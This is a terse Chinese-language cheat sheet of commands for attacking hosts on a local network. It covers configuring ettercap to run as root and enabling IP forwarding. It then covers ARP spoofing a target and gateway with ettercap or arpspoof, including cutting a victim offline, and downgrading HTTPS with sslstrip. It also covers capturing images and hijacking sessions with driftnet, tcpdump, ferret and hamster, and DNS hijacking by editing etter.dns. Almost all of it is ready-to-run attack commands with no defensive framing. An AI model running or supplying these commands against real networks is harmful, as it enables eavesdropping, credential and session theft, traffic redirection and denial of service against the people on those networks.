一、 更改配置
vi ./etc/Network-manager restart
#修改false为ture
service network-manager restart
vi ./etc/ettercap/etter.conf
ecuid/ecgid 全改成0
if you use iptables 后面内容去注释
*
二、arp欺骗、嗅探
(1)ettercap
echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote /目标IP/网关/ (也可以写作:// //)
#局域网内全ip、所有网关 i:网卡 Tq:文本模式
只有ettercap可以抓取文字,且ettercap集成了DNS欺骗插件
(2)arpspoof
echo 1 >>/proc/sys/net/ipv4/ip_forward
arpspoof -i 网卡 -t 网关 目标IP
#通说是: 目标 网关
#断网
arpspoof -i 网卡 -t 网关 目标IP
实现欺骗后,嗅探:
#(嗅探)将https链接还原为http
sslstrip -a -f -k
#查看图片
driftnet -i eth0
#session劫持
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster
三、DNS劫持
(1)使用ettercap进行arp欺骗
(2)修改etter.dns文件
echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote // //
vi /etc/ettercap/etter.dns